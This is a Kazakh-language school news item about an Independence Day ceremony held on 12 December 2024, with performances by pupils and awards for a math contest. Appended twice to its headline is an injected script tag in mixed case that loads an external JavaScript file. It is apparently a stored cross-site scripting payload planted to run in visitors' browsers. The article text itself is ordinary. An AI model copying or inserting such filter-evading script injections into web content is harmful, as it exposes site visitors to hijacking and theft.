Қазақстан Республикасының Тәуелсіздік күніне арналған салтанатты жиын<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.12.2024

2024 жылғы 12 желтоқсанда Қазақстан Республикасының Тәуелсіздік күніне арналған салтанатты жиын өткізілді. Қазақстан Тәуелсіздік күні-Қазақстан Республикасының басты ұлттық мерекесі. Бұл іс-шараның мақсаты-өз Отанына деген патриоттық сезімді, азаматтық борыш сезімін, болашақ алдындағы жауапкершілікті қалыптастыру. Тарих алдында әркімнің жауапкершілік сезімін қалыптастыру. Әсіресе, сол күні өткен мерекелік жиынды атап өткім келеді. Екі тілде жүргізушілердің сөздері салтанатты түрде айтылды. Мектеп оқушылары ҚР Әнұранын орындады, өлең оқыды, ән шырқады, "Шашу" қазақ биін биледі. Мектеп директоры Гүлжихан Бәкірқызы Жүсіпова барлығын келе жатқан Тәуелсіздік күнімен құттықтап, 1 сынып оқушыларын математикадан Республикалық "Кенгуру" байқауында алған жүлделі орындары үшін грамоталармен марапаттады. Бұл іс-шара оқушыларда патриотизмге тәрбиелеуге, мемлекетке құрметпен қарауды дамытуға, халықтың әдет-ғұрыптарына, салт-дәстүрлеріне оң көзқарасты қалыптастыруға, Отан тағдырына қатыстылық сезімін дамытуға ықпал етті.

Просмотров: 460


Пікір қосу



Деректерді қолтаңбаға қосу